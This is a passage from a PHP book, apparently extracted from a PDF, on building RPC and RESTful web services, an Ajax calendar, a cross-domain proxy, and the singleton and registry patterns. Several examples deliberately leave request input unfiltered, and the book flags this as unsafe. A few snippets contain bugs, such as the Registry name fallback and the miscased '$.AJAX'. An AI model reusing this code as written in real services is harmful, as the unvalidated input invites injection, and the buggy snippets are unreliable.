switch($_GET['method']) {
case 'countWords':
$response = ServiceFunctions::countWords($_GET['words']);
break;
case 'getDisplayName':
$response = ServiceFunctions::getdisplayName➥
($_GET['first_name'], $_GET['last_name']);
break;
default:
$response = "Unknown Method";
break;
}
} else {
$response = "Unknown Method";
}
APIs
header('Content-Type: application/json');
echo json_encode($response);
This illustrates the point that web services are not rocket science rather well! We
simply take the method parameter, and if it’s a value we were expecting, call the
method in the ServiceFunctions class accordingly. Once we’ve done that, or we
receive an error message, we format the output as JSON and return it.
Having the output formatting as the last item in the script means that it would be
simple to refactor this section to return different formats in response to the user’s
Accept header or an incoming format parameter. A good API will support different
outputs, and a structure similar to this—where even error messages all go through
the same output process—is a great me of achieving the flexibility to encode the
output in different ways.
APIs and Security
One of the most striking points about this code sample is the use of $_GET variables
as parameters to functions without any security additions at all. This is purely to
keep the example simple; however, it would be very risky to publish code like
this on a public API! Security for APIs is exactly the same as for any other application. Filter your input, escape your output, and check Chapter 5 for more information on this topic.
To consume these methods over the API, we can simply request the following URLs:
http://localhost/json-rpc.php?method=getdisplayName&first_name=➥
Jane&last_name=Doe
// outputs: "J Doe"
http://localhost/json-rpc.php?method=countWords&words=➥
Mary%20had%20a%20little%20lamb
// outputs: 5
Notice that we are URL-encoding our parameters when we pass these into the service.
Our RPC example uses GET requests. These are simple to form and test, and easy to
understand. Since our examples are so tiny, it’s a perfectly good choice. Many RPC
105
106
PHP Master: Write Cutting-edge Code
services use POST data, and this is a better choice when working with larger data
sets, as there’s a limit on the size that a URL can be, and this differs between systems.
The main point to note is that RPC is quite a loose umbrella term, and you will
implement the service differently—depending on who or what will be using the
service, and on the data that needs to be transmitted.
Ajax and Web Services
Most of the time we think of Ajax as a nice little tool we can use to dynamically fill
in bits of data without reloading the page. Sometimes you’ll return XML (rarely),
while at other times you’ll return JSON (sometimes); a lot of the time you will simply
return HTML snippets to plug directly into the page.
When we pair Ajax with an API, we can take our nice little tool and turn it into an
integral part of our site’s architecture; this is an example of the SOA we covered in
the section called “Service-oriented Architecture”. When we build an API for our
users to access our site’s data, there’s no reason why that same site shouldn’t use
Ajax to retrieve data using that very same API.
Beware the Same Origin Policy
All browsers implement a security feature called the Same Origin Policy. This is
a security feature that stops Ajax requests being performed against a domain other
than the one used by the website. For example, from johnsfarmwidgets.org you
cannot use Ajax to directly hit twitter.com to pull in your tweets. In order to get
around this, you can implement a proxy script; there’s an example showing how
to do this in the next section.
Let’s look at an event calendar as an example. First, we’ll create a small table that
indicates upon which days of the month events occur:
chapter_03/calendar_table.php
<!-- Set an ID of calendar -->
<table id="calendar" cellpadding="0" cellspacing="0">
<tr>
<!-- Show the current Month -->
<th colspan="7">May 2011</th>
</tr>
APIs
<tr>
<!-- Days of the Week -->
<th>S</th>
<th>M</th>
<th>T</th>
<th>W</th>
<th>T</th>
<th>F</th>
<th>S</th>
</tr>
<!-- Days -->
<tr>
<td>1</td>
<td>2</td>
<td>3</td>
<td>
<!-- Link to each event on the appropriate day -->
<a href="/events/189">4</a>
</td>
<td>5</td>
<td>6</td>
<td><a href="/events/194">7</a></td>
</tr>
<tr>
<td>8</td>
<td>9</td>
<td><a href="/events/234">10</a></td>
<td>11</td>
<td>12</td>
<td>13</td>
<td>14</td>
</tr>
<tr>
<td>15</td>
<td>16</td>
<td>17</td>
<td>18</td>
<td>19</td>
<td><a href="/events/300">20</a></td>
<td>21</td>
</tr>
<tr>
<td>22</td>
<td>23</td>
<td>24</td>
107
108
PHP Master: Write Cutting-edge Code
<td>25</td>
<td>26</td>
<td>27</td>
<td>28</td>
</tr>
<tr>
<td>29</td>
<td>30</td>
<td><a href="/events/1337">31</a></td>
<td colspan="4">
<!-- Fill in the leftover days with blanks -->
</td>
</tr>
</table>
Nothing too exciting here, right? Users can just click the link and go to a page with
relevant information for the event. This table, with some CSS help, is depicted in
Figure 3.2.
Figure 3.2. Our table transformed
However, with just a little sprinkling of JavaScript, using Ajax and our API, we can
enhance the experience for our users greatly.
APIs
Progressive Enhancement
Progressive enhancement is a technique for ensuring your pages are accessible.
By using a real table with real links that go to real pages with real relevant
data—and then using JavaScript to turn those links into Ajax requests—we can
ensure that even a user without JavaScript turned on (perhaps a person using a
screen reader, or a search bot) can still reach the relevant content.
In this code, after the document has finished loading (and therefore our table markup
is ready to be manipulated), we simply attach an onclick event that will perform
an Ajax request to the link’s href value; because of content negotiation, it returns
a JSON data structure instead of the full HTML page. We can then show the resulting
JSON data in a tooltip. This allows our users to quickly review many events without
reloading the page.
One such JSON response might be:
{title: "Davey Shafik's Birthday!", date: "May 31st 2011"}
In this example, we’re using the jQuery library; however, you can achieve the same
with almost any JavaScript library, or with plain JavaScript:
chapter_03/calendar_js.php
<script type="text/javascript">
// Wait till the document has loaded
$(function() {
// For all anchors inside our table cells, add an onclick event
$('#calendar td a').click(
function (event) {
// Stop the link from triggering
event.preventDefault();
// Stop the body click from triggering
event.stopPropagation();
// Remove existing tooltips:
$('#calendar td div').remove();
// Create a simple container for our data
var tooltip = $('<div/>').css("position", "absolute").➥
addClass('tooltip');
109
110
PHP Master: Write Cutting-edge Code
// Perform the AJAX request to the anchors link
$.AJAX({
url: this.href,
success: function(data) {
// On success, add the data inside our tooltip
tooltip.append("<p><b>Event:</b> " + data.title +➥
"<br /> <b>Date:</b> " +data.date+ "</p>");
// Add the tooltip to the table cell
this.parent().append(tooltip);
}
});
}
);
// Add an onclick to the body to remove existing tooltips so➥
the user can move on by clicking anywhere
$('body').click(function() {
$('#calendar td div').remove();
});
});
</script>
Clicking on a date will update the page to look as it does in Figure 3.3.
Figure 3.3. Updated table with birthday event in a tooltip
APIs
Reusing your own public API makes a lot of sense, for a number of reasons:
■ ensures that your API is easy to use, and returns sensible, usable data
■ avoids duplication of code
■ provides consumers of your public API with a working example
Cross-domain Requests
One of the common problems when trying to use Ajax is that the browser will prohibit you from making requests to any domain other than the one from which the
request is made—the Same Origin Policy. There are many ways to get around this,
such as using iframes or pulling in JSON using dynamically generated <script>
tags with a remote server as the src; however, the most robust and secure is the use
of a server-side proxy that’s hosted on the same domain which the Ajax request is
being made from. This proxy script will accept the request and forward it to the
remote server, and then return the result to the browser.
An added benefit to the proxy is that you can transform the result from the remote
service into a data structure that better suits your needs; for example, convert XML
into JSON.
Beware Security Risks!
The most common security risk associated with the cross-domain proxy is failing
to limit which remote servers the requests can be made to. This allows an attacker
to pull in content code from their own servers that contains malicious code, or in
some other way damages the server and/or its users.
So what does this proxy script look like? Big and scary, right? Wrong. Well, maybe
a little:
chapter_03/proxy.php (excerpt)
// An array of allowed hosts with their HTTP protocol (i.e. http➥
or https) and returned mimetype
$allowed_hosts = array(
'api.bit.ly' => array(
"protocol" => "http",
"mimetype" => "application/json",
"args" => array(
111
112
PHP Master: Write Cutting-edge Code
"login" => "user",
"apiKey" => "secret",
)
)
);
// Check if the requested host is allowed, PATH_INFO starts with a /
$requested_host = parse_url("http:/" .$_SERVER['PATH_INFO'],➥
PHP_URL_HOST);
if (!isset($allowed_hosts[$requested_host])) {
// Send a 403 Forbidden HTTP status code and exit
header("Status: 403 Forbidden");
exit;
}
// Create the final URL
$url = $allowed_hosts[$requested_host]['protocol'] . ':/' .➥
$_SERVER['PATH_INFO'];
if (!empty($_SERVER['QUERY_STRING'])) {
// Construct the GET args from those passed in and the default
$url .= '?' .http_build_query($_GET + ($allowed_hosts➥
[$requested_host]['args']) ?: array());
}
// Instantiate curl
$curl = curl_init($url);
// Check if request is a POST, and attach the POST data
if ($_SERVER['REQUEST_METHOD'] == "POST") {
$data = http_build_query($_POST);
curl_setopt ($curl, CURLOPT_POST, true);
curl_setopt ($curl, CURLOPT_POSTFIELDS, $data);
}
// Don't return HTTP headers. Do return the contents of the call
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// Make the call
$response = curl_exec($curl);
// Relay unsuccessful responses
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($status >= "400") {
header("Status: 500 Internal Server Error");
APIs
}
// Set the Content-Type appropriately
header("Content-Type: " .$allowed_hosts[$requested_host]➥
['mimetype']);
// Output the response
echo $response;
// Shutdown curl
curl_close($curl);
This proxy allows us to whitelist allowed domains, in this case api.bit.ly, as well
as specify the API’s protocol (HTTP or HTTPS) and default arguments, such as our
private login and apiKey arguments. This way, they’re not publicly visible in our
JavaScript source.
Assuming this script is in your webroot as proxy.php, you can now simply send an
Ajax request to /proxy.php/api.bit.ly/v3/shorten?longUrl=URL and receive the bit.ly
API response. In this example, we’re going to shorten the user’s website URL after
they enter it into a form:
chapter_03/proxy.php (excerpt)
<script type="text/javascript">
function shortenWebsiteURL(url) {
$.AJAX(
url: "/proxy.php/api.bit.ly/v3/shorten",
data: {longUrl: url},
success: function(data) {
$('input#website').attr('value', data.url);
}
);
}
</script>
As with the earlier cURL request, the API responds with a JSON value in this way:
{ "status_code": 200, "status_txt": "OK", "data": { "long_url":➥
"http:\/\/lornajane.net\/", "url":
"http:\/\/bit.ly\/nM02pD", "hash": "nM02pD", "global_hash":➥
"glZgTN", "new_hash": 1 } }
113
114
PHP Master: Write Cutting-edge Code
Of course, you can also build this into your existing MVC systems and take advantage
of the routing there, allowing you to use a URL such as /proxy/api.bit.ly/v3/shorten.
As you can see, with just a little bit of effort, JavaScript (specifically Ajax) and APIs
get along spectacularly well. Whether you use it to access your own APIs or those
of some third party, you can enhance your site’s experience with ease.
Developing and Consuming RESTful Services
Perhaps the most important question here is: What is REST and why do I care?
We’ve covered some widely used and perfectly adequate service formats already,
and since PHP users have been programming with functions for years, we can
probably do everything we need to with the RPC-style services.
REST stands for REpresentational State Transfer, and is more than an alternative
protocol. It’s an elegant and simple way to expose CRUD (Create, Replace, Update,
Delete) functionality for items over HTTP. REST is designed to be lightweight to
take advantage of the features of HTTP as they were originally intended—features
such as the headers and verbs we discussed earlier in this chapter.
REST has gained in popularity over the last few years, yet it is conceptually very
different to the function-based styles that developers are more accustomed to; as a
result, many services described as “RESTful” are, strictly speaking, not entirely
compatible with that description.
Avoid the Zealots
Whenever you publish a RESTful service, it’s likely that someone, somewhere
will complain that you have violated one or more principles of REST—and they’re
probably right! REST is quite an academic set of principles which doesn’t always
lend itself well to business applications. To avoid criticism, simply market your
service as an HTTP web service instead.
Each of the various types of service that REST offers has its strengths. REST is most
often used in services that are strongly data-related, such as when providing the
service layer in a service-oriented architecture. A RESTful service is often quite a
close reflection of the underlying data storage in an application, which is why it’s
a good fit in these situations. The concept shift as mentioned can be a negative point
APIs
when considering building a RESTful service; some developers may find it more
difficult to work with.
Beyond Pretty URLs
Possibly one of the most eye-catching features of RESTful services is that they’re
very much about URL structure. They follow a strict use of URLs, and this means
that you can easily see from the URL and words contained within what is happening—this is in direct contrast to RPC services, which typically have a single endpoint.
The emphasis on URLs is because everything in REST is a resource. A resource
might be a:
■ user
■ product
■ order
■ category
In RESTful services, we see two types of URLs. The first are collections; these are
like directories on a file system, as they contain a list of resources. For example, a
list of events would have a URL such as:
http://example.com/events/
An individual event would have a URL with a specific identifier associated with
it, such as:
http://example.com/events/72
When we issue a GET request to this URL, we’ll receive the data related to this event,
listing the name, date, and venue. If this service exposes information about the
tickets sold for the event, the URL might take a format such as:
http://example.com/events/72/tickets
This tickets URL is another example of a collection, and we’d expect to see one or
more price items listed here.
115
116
PHP Master: Write Cutting-edge Code
RESTful Principles
We’ve already seen the URL structure for RESTful services, and discussed the way
that HTTP is used to implement these services. Let’s take a moment to outline the
main characteristics of a service of this type:
■ All items are resources, and each resource has its own unique resource identifier
(URI).
■ The service deals in representations of these resources, which can be manipulated
in different ways using HTTP verbs to indicate which action should be performed.
■ They are stateless services, where each request contains all the information
needed to complete it successfully, and doesn’t rely on the resource being in
any particular state.
■ Format information and status messages are all transmitted in the HTTP envelope;
any parameters or body content relate only to the data under consideration.
Some of these ideas may become clearer as we cover examples of building and
consuming this type of service.
Building a RESTful Service
The next few pages cover the building of an example RESTful service. We’ll examine
each piece of code in turn. The service is built-in PHP, with example calls being
made to it using cURL from PHP; you could of course use either pecl_http or streams
instead, if you wanted to.
Using Rewrite Rules to Redirect to index.php
This is a common feature of many modern dynamic systems; routing all requests
to index.php and then parsing the URL to figure out exactly what the user wanted.
We’ll use the same approach in our application, and bring all requests into index.php
to ensure that we always set up and process the data in the same way. To achieve
this using Apache as the web server, we have the following in our .htaccess file:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
APIs
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
</IfModule>
Collecting Incoming Data
To begin with, we need to figure out what came in with the request, and store that
information somewhere. Here we’re creating a Request object, which is simply an
empty class, but using it gives us somewhere to keep the variables together, and an
easy way to add functionality later if we need it. We then check the method that
was used, and capture the data accordingly:
chapter_03/rest/index.php (excerpt)
// initialize the request object and store the requested URL
$request = new Request();
$request->url_elements = array();
if(isset($_SERVER['PATH_INFO'])) {
$request->url_elements = explode('/', $_SERVER['PATH_INFO']);
}
// figure out the verb and grab the incoming data
$request->verb = $_SERVER['REQUEST_METHOD'];
switch($request->verb) {
case 'GET':
$request->parameters = $_GET;
break;
case 'POST':
case 'PUT':
$request->parameters = json_decode(file_get_contents➥
('php://input'), 1);
break;
case 'DELETE':
default:
// we won't set any parameters in these cases
$request->parameters = array();
}
First of all, we dissect the URL to work out what the user requested. For example,
to request a list of events, the user would make a request like this:
117
118
PHP Master: Write Cutting-edge Code
$ch = curl_init('http://localhost/rest/events');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
$events = json_decode($response,1);
How the parameters arrive into our script will depend entirely on the method used
to request, so we use a switch statement and pull out the arguments accordingly.
While $_GET should be familiar, for POST and PUT we’re dealing with a body of JSON
data rather than a form, so we use the php://input stream directly. Exactly like
when we used streams to make web requests early in this chapter, PHP knows how
to handle the php:// stream. Then we use json_decode() to parse the data into an
array of keys and values, just like we’d find in $_GET or $_POST.
Routing the Requests
Now we know what the URL was, which parameters were supplied, and what
method was used, we can route the request to the correct piece of code. We’ve created
a controller class for each of the URL portions that might be used first after the domain name, and we’ll call a function inside each one that relates to the method that
the request used.
MVC and REST
Since a RESTful service follows so many of the principles of a standard MVC
pattern, we can very easily use one here. While this example is much smaller than
the services you’ll build in the real world, you can still see this pattern emerging
in places, and the controller object containing actions is certainly a familiar element. You can find more information and examples on MVC in Chapter 4.
The routing code for this simple system is this:
chapter_03/rest/index.php (excerpt)
// route the request
if($request->url_elements) {
$controller_name = ucfirst($request->url_elements[1]) .➥
'Controller';
if(class_exists($controller_name)) {
$controller = new $controller_name();
$action_name = ucfirst($request->verb) . "Action";
$response = $controller->$action_name($request);
APIs
} else {
header('HTTP/1.0 400 Bad Request');
$response = "Unknown Request for " . $request->url_elements[1];
}
} else {
header('HTTP/1.0 400 Bad Request');
$response = "Unknown Request";
}
We’re taking the pieces of the URL that we split out earlier, and using the first one
(which is element index 1, as element 0 will always be empty) to inform which
controller to use. For the example URL http://example.com/events, the value of
$controller_name becomes EventController and, since it’s a GET request, the
$action_name is GETAction().
This system has a very simple autoloading function that will load the controllers
for us as we need them (we covered autoloading in Chapter 1, so feel free to refer
to that chapter for more detail). This means that we can simply build the name of
the class we want, and then instantiate one. We pass the request object into our
action so that we can access the data we gathered earlier.
One final point to note here is that this code doesn’t echo any output. Instead, it
stores the data in $response. This is so that we avoid sending any response at all
until right at the end of the script, when we can pass all data through the same
output handlers; you’ll see this shortly.
A Note on Data Storage
In order to avoid being bogged down in too many other dependencies such as
databases, this service simply serializes data to a text file for storage (and invents
some data if there’s none present!). You will see calls to readEvents() and
writeEvents(), and those functions are as follows:
chapter_03/rest/eventscontroller.php (excerpt)
protected function readEvents() {
$events = unserialize(file_get_contents($this->events_file));
if(empty($events)) {
// invent some event data
$events[] = array('title' => 'Summer Concert',
'date' => date('U', mktime(0,0,0,7,1,2012)),
119
120
PHP Master: Write Cutting-edge Code
'capacity' => '150');
$events[] = array('title' => 'Valentine Dinner',
'date' => date('U', mktime(0,0,0,2,14,2012)),
'capacity' => '48');
$this->writeEvents($events);
}
return $events;
}
protected function writeEvents($events) {
file_put_contents($this->events_file, serialize($events));
return true;
}
The storage you choose for your service will depend entirely on your application,
using all the same criteria you’d use when choosing storage for any other web project.
The serialized-array-in-a-file approach is really only advisable for “toy” projects
like this one.
GETting One Event or Many
When we introduced the idea of RESTful services, we saw that it included both
resources and collections. Our GETAction() will need to handle requests both to a
collection and to a specific resource. So we’re expecting requests that could look
like either of these:
http://example.com/events
http://example.com/events/72
Making the request happens exactly as in our original example; only the URL would
change, depending on whether you were requesting the controller or the resource.
On the server side, our action code looks as such:
chapter_03/rest/eventscontroller.php (excerpt)
public function GETAction($request) {
$events = $this->readEvents();
if(isset($request->url_elements[2]) && is_numeric➥
($request->url_elements[2])) {
return $events[$request->url_elements[2]];
} else {
APIs
return $events;
}
}
We get the list of events, and if a specific one was requested, we return just that
item, otherwise we return the whole list. If you’re wondering about the values in
$request->url_elements, remember that this came from
explode($_SERVER['PATH_INFO']). If we were to inspect the output of this—for
example, on the request to http://example.com/events/72—we'd see this:
Array
(
[0] =>
[1] => events
[2] => 72
)
As a result, we use the third element as the ID of the event that we want to find and
return to the user.
Creating Data with POST Requests
To create data in a RESTful service, we make a POST request, sending data fields to
populate the new record. To do so in this example, we make this request:
$item = array("title" => "Silent Auction",
"date" => date('U', mktime(0,0,0,4,17,2012)),
"capacity" => 210);
$data = json_encode($item);
$ch = curl_init('http://localhost/rest/events');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
$events = json_decode($response,1);
The request goes to the collection, and the service itself will assign an ID and return
information about it; it’s fairly common to redirect the user to the new resource
location, and that is what we’ve done here. Here’s the code:
121
122
PHP Master: Write Cutting-edge Code
chapter_03/rest/eventscontroller.php (excerpt)
public function POSTAction($request) {
// error checking and filtering input MUST go here
$events = $this->readEvents();
$event = array();
$event['title'] = $request->parameters['title'];
$event['date'] = $request->parameters['date'];
$event['capacity'] = $request->parameters['capacity'];
$events[] = $event;
$this->writeEvents($events);
$id = max(array_keys($events));
header('HTTP/1.1 201 Created');
header('Location: /events/'. $id);
return '';
}
The data comes in with this request in JSON format in our service, and we parsed
it near the start of the script. To keep the example simple, we unquestioningly accept
the data and save it; however, in a real application we’d apply all the same practices
that we would with any other form input. Web services follow all the principles of
any other web application, so, if you’re already a web developer, you know what
to do here!
The headers here let the client know that the record was created successfully. If the
data is invalid, or we detect a duplicate record, or anything else goes wrong, we
return an error message. As it is, we let the client know we have created the record,
and then redirect them to where that can be found.
Updating Resources with PUT
As we turn our attention to PUT requests, we’re dealing with a method that is unfamiliar. We use GET and POST for forms, but PUT is something new. In fact, it’s not
all that different! We already saw how to retrieve the parameters from the request,
and once we’ve routed the request, the fact that it was originally a PUT request
doesn’t affect the code. The request would be made along these lines: first, by
fetching a particular event (we’re using event 4 as an example), then by changing
fields appropriately, and then by using PUT to send the changed data back to the
same resource URL:
APIs
// get the current version of the record
$ch = curl_init('http://localhost/rest/events/4');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
$item = json_decode($response,1);
// change the title
$item['title'] = 'Improved Event';
// send the data back to the server
$data = json_encode($item);
$ch = curl_init('http://localhost/rest/events/4');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
Notice that we’ve sent all the fields from the resource, not just the ones we wanted
to change. This is standard practice; a RESTful service only deals in representations
of whole resources. There is no alternative to something like setTitle($newTitle)
in REST; we can only operate on resources. Our code to handle this request is:
chapter_03/rest/eventscontroller.php (excerpt)
public function PUTAction($request) {
// error checking and filtering input MUST go here
$events = $this->readEvents();
$event = array();
$event['title'] = $request->parameters['title'];
$event['date'] = $request->parameters['date'];
$event['capacity'] = $request->parameters['capacity'];
$id = $request->parameters['id'];
$events[$id] = $event;
$this->writeEvents($events);
header('HTTP/1.1 204 No Content');
header('Location: /events/'. $id);
return '';
}
We hope the evidence shown here backs up the earlier claim that a PUT request requires no special skills for us to handle it. This code is fairly similar to the
POSTAction() code.
123
124
PHP Master: Write Cutting-edge Code
DELETEing Records
If you’re still reading, this is the easy bit! To delete a resource, we simply make a
DELETE request to its URL. This looks similar to the other requests, but let us include
it for completeness:
$ch = curl_init('http://localhost/rest/events/3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "DELETE");
$response = curl_exec($ch);
Reasonably straightforward, right? And our server-side code is also simpler than it
has been for some of the other actions, partly because there’s no need to worry about
data fields when we receive a DELETE request. Here it is:
chapter_03/rest/eventscontroller.php (excerpt)
public function DELETEAction($request) {
$events = $this->readEvents();
if(isset($request->url_elements[2]) && is_numeric➥
($request->url_elements[2])) {
unset($events[$request->url_elements[2]]);
$this->writeEvents($events);
header('HTTP/1.1 204 No Content');
header('Location: /events');
}
return '';
}
Simply put, we identify which record should be deleted, remove it from the events
array, and redirect the user back to the events list.
One aspect you’ll notice, reading this action and many of the others, is that the code
is more short-and-readable than watertight. This is purely to make it easy to see the
elements of the scripts that are specific to illustrating the RESTful API. Everything
you already know about security and handling failure also applies to services—so
use those skills too when creating for a public-facing server.
APIs
Designing a Web Service
There are some key points to bear in mind when creating a web service. This section
runs through some of the main considerations when creating an appropriate and
useful service.
The first decision to make is which service format you’ll use. If your service is
tightly coupled to representing data, you might choose a RESTful service. For exchanging data between machines, you might pick XML-RPC or SOAP, especially if
this is an enterprise environment where you can be confident that SOAP is already
well understood. For feeding asynchronous requests from JavaScript or passing data
to a mobile device, JSON might be a better choice.
As you work on your web service, always bear in mind that users will pass nonsense
into the service. This isn’t to say that users are idiots, but we all sometimes misunderstand (or omit to read) the instructions, or just plain make mistakes. How your
service responds in this situation is the measure of how good it is. A robust and
reliable service will react to failure in a non-damaging way and give informative
feedback to the user on what went wrong. Before we move on from this topic, the
most important point is this: error messages should be returned in the same format
as the successful output would arrive in.
There is a design principle called KISS (Keep It Simple, Stupid), and less is more
when it comes to API design. Take care to avoid making a wide, sprawling, and
inconsistent API. Only add features when they are really needed and be sure to
keep new functionality in line with the way the rest of the API has been implemented.
A web service is incomplete until it has been delivered with documentation. Without
the documentation, it is hard for users to use your service, and many of them won’t.
Good documentation removes the hurdles and allows users to build on the functionality you expose—to build something wonderful of their own.
When it comes down to it, exposing an API, either internally or as part of a serviceoriented internal architecture, is all about empowering others to take advantage of
the information available. Whether these others are software or people, internal or
external, that basic aim doesn’t change. The building blocks of a web service are
125
126
PHP Master: Write Cutting-edge Code
the same as those of a web application, with the addition of a few specific terms
and skills that we covered in this chapter.
Service Provided
This chapter covered a lot of ground, and you may find that you dip into different
sections of it as your needs change over a series of projects. As well as the theory
of HTTP and the various data formats commonly used in web services, we’ve shown
how to publish and consume a variety of services, both from PHP and on the client
side. You can now create robust, reusable web services, both as an element of the
internal architecture of your system, and for exposing to external consumers.
Chapter
4
Design Patterns
In this chapter, you’ll learn some essential design principles that will form the
keystone of many architectural decisions you’ll make along your application’s development path.
As with the real world, repeated tasks have best practices—you put your clothes
through the washing machine before sticking them in the dryer or on the clothesline,
right? Similarly, common code architecture problems have best-practice solutions;
these are known as design patterns.
What Are Design Patterns?
Hammer: nail. Screwdriver: screw. You need the right tool for the right job. Design
patterns are really just a bunch of tools in your toolbox; sometimes you’ll find one
that fits the job, sometimes you need to use more than one, and sometimes you just
need to create your own.
As you familiarize yourself with common design patterns, their uses will become
applicable in more and more situations. In time, you’ll find yourself seeing the
patterns in code that lend themselves to a particular design pattern.
128
PHP Master: Write Cutting-edge Code
It is just as important to recognize when to use a design pattern as it is to know
when not to use one. Be mindful that design patterns aren’t the answer to every architecture problem.
Choosing the Right One
While not always a perfect fit, nobody ever said that design patterns are a rigid onesize-fits-all solution; you will change them, and shape them to fit the task at hand.
With some patterns, this is inherent in the very nature of their application; in others,
you’ll be changing the pattern itself. It is not uncommon for patterns to complement
each other and to work in tandem; they are building blocks from which your application (at least in part) can be built.
Because design patterns follow best practice, they can be considered de facto
standards. New developers coming into the codebase will more quickly pick up the
code, boosting productivity. And this is not to mention what the use of design patterns does for future development and maintenance.
Singleton
The first pattern we’ll look at is the singleton pattern. It ensures that when you instantiate an object, you instantiate only one instance of a class, and can then recall
that same object anywhere in your code, easily. Think of the singleton pattern as a
cookie jar with only one cookie in it. You can open the lid of the jar, but you’re not
allowed to eat the cookie—just enjoy its aroma.
With the singleton pattern, an object is instantiated when you first call for it (known
as lazy loading); from that point on, each call will return the same object. The
singleton pattern is generally used for objects that represent resources to be used
over and over within many different parts of the application, but should always be
the same. Common examples might include your database connections and configuration information.
The most important aspect of a singleton is limiting the ability to create instances.
If this isn’t done, the potential exists for multiple instances to be created, causing
havoc. This limiting capacity is achieved by making the constructor private, and
having a static function that will either construct a new instance—if none exists—or
will return a reference to the singleton instance:
Design Patterns
chapter_04/Singleton.php
// The Database class represents our global DB connection
class Database extends PDO {
// A static variable to hold our single instance
private static $_instance = null;
// Make the constructor private to ensure singleton
private function __construct()
{
// Call the PDO constructor
parent::__construct(APP_DB_DSN, APP_DB_USER, APP_DB_PASSWORD);
}
// A method to get our singleton instance
public static function getInstance()
{
if (!(self::$_instance instanceof Database)) {
self::$_instance = new Database();
}
return self::$_instance;
}
}
There are three crucial points to implementing the singleton:
1. A static member to hold our single instance—in this example, we have a private
DB::$_instance property
2. Next, a private __construct() so that the class can only be instantiated by a
static method contained within itself
3. For our database class, the DB::getInstance() static method. When called,
DB::getInstance() will either instantiate an object of the Database class and
assign it to the DB::$_instance property, then return it, or simply return the
previously instantiated object.
To use the singleton, because static methods are accessible within the global scope,
wherever we want a database connection, we can simply call DB::getInstance().
129
130
PHP Master: Write Cutting-edge Code
Problems with Singletons
There are several problems built into the fabric of the singleton pattern. The first
and foremost is that while the idea of a singleton seems great (who needs two
database connections?), the limitation quickly becomes apparent as you find you
need a second instance for some new aspect of your software. For example, what
happens if you decide to split database read/writes to different servers?
Add to this that singletons are designed to hang around once an object is instantiated,
and unit testing becomes a nightmare. To solve the first issue, you might think to
create an abstract parent DBConnection class with a protected constructor from
which you extend with DBWriteConnection and DBReadConnection concrete classes,
but you either are unable to declare the static $_instance variable in the parent
class (making it less declarative), or this method simply fails to work!
This issue is why you cannot declare a simple abstract Singleton class from which
all singletons should inherit. This issue can, however, be solved with a new PHP
feature: the trait.
Traits
Traits are a new feature slated for the release of PHP 5.4. While there are still some
minor issues that need to be worked out with this feature, it is certainly generating
a lot of excitement. Traits are, in their most basic form, considered to be a compilerassisted copy-and-paste technique. Let’s have a closer look at what that means for
our code architecture.
Traits are defined like classes, except you use the trait keyword instead of class when
you declare them. They can then be used within a class definition by making use
of the keyword use:
// Define the Singleton Trait
trait Singleton {
// A static variable to hold our single instance
private static $_instance = null;
// A method to get our singleton instance
public static function getInstance()
{
Design Patterns
// Dynamically use the current class name
$class = __CLASS__;
if (!(self::$_instance instanceof __CLASS__)) {
self::$_instance = new $class();
}
return self::$_instance;
}
}
class DBWriteConnection extends PDO {
// Use the Singleton trait
use Singleton;
private function __construct()
{
parent::__construct(APP_DB_WRITE_DSN, APP_DB_WRITE_USER,➥
APP_DB_WRITE_PASSWORD);
}
}
class DBReadConnection extends PDO {
// Use the Singleton trait
use Singleton;
private function __construct()
{
parent::__construct(APP_DB_READ_DSN, APP_DB_READ_USER,➥
APP_DB_READ_PASSWORD);
}
}
While this solves the immediate problem of reusing the singleton pattern itself, it
doesn’t help if we want two instances of the same class at a later date. This highlights
the single biggest problem with singletons: they inhibit growth and reuse when
used improperly. How do we get around this issue? Let’s employ the registry pattern
instead.
Registry
Okay, so it shares its name with a much-hated operating system configuration
store—but forget that definition. The registry pattern is simply a single global class
131
132
PHP Master: Write Cutting-edge Code
that allows your code to retrieve the same instance of an object when you want it,
as well as creating other instances when you want them (and again, access those
instances globally on demand).
The registry is your own personal object library … without all the fuss of the Dewey
Decimal System. You can check objects in and check them out again whenever you
want to, without the fear of performance penalties if you hang on to them for too
long.
The simplest way to think of the registry pattern is as a key/value store, with the
key being an identifier for an instance of an object, and the value being the instance
itself. The pattern comes into play when you need to manage this array of key/value
pairs, store the instances on first instantiation, and return a reference to the same
instance on request.
As with singletons, the registry pattern is used for accessing globally reusable objects;
the difference is that the registry isn’t responsible for creating the objects, but purely
maintaining the global store, and can hold any number of instances of the same
class. This makes it perfect for the two scenarios we looked at with the singleton
pattern—database connections and configuration objects—with two usages of our
registry class.
Our registry implementation has four methods:
1. Registry::set()—adds an object to the registry; you can specify a name (for
multiple instances) or it will use the class name by default (for singleton-like
behavior)
2. Registry::get()—retrieves an object from the registry by name
3. Registry::contains()—checks if an object exists in the registry
4. Registry::unset()—removes an object from the registry by name
Here’s how these four methods might look contained within our Registry class:
chapter_04/Registry.php
class Registry {
/**
* @var array The store for all of our objects
Design Patterns
*/
static private $_store = array();
/**
* Add an object to the registry
*
* If you do not specify a name the class name is used
*
* @param mixed $object The object to store
* @param string $name Name used to retrieve the object
* @return mixed If overwriting an object, the previous object➥
will be returned.
* @throws Exception
*/
static public function add($object, $name = null)
{
// Use the class name if no name given, simulates singleton
$name = (!is_null($name)) ?: get_class($object);
$name = strtolower($name);
$return = null;
if (isset(self::$_store[$name])) {
// Store the old object for returning
$return = self::$_store[$name];
}
self::$_store[$name]= $object;
return $return;
}
/**
* Get an object from the registry
*
* @param string $name Object name, {@see self::set()}
* @return mixed
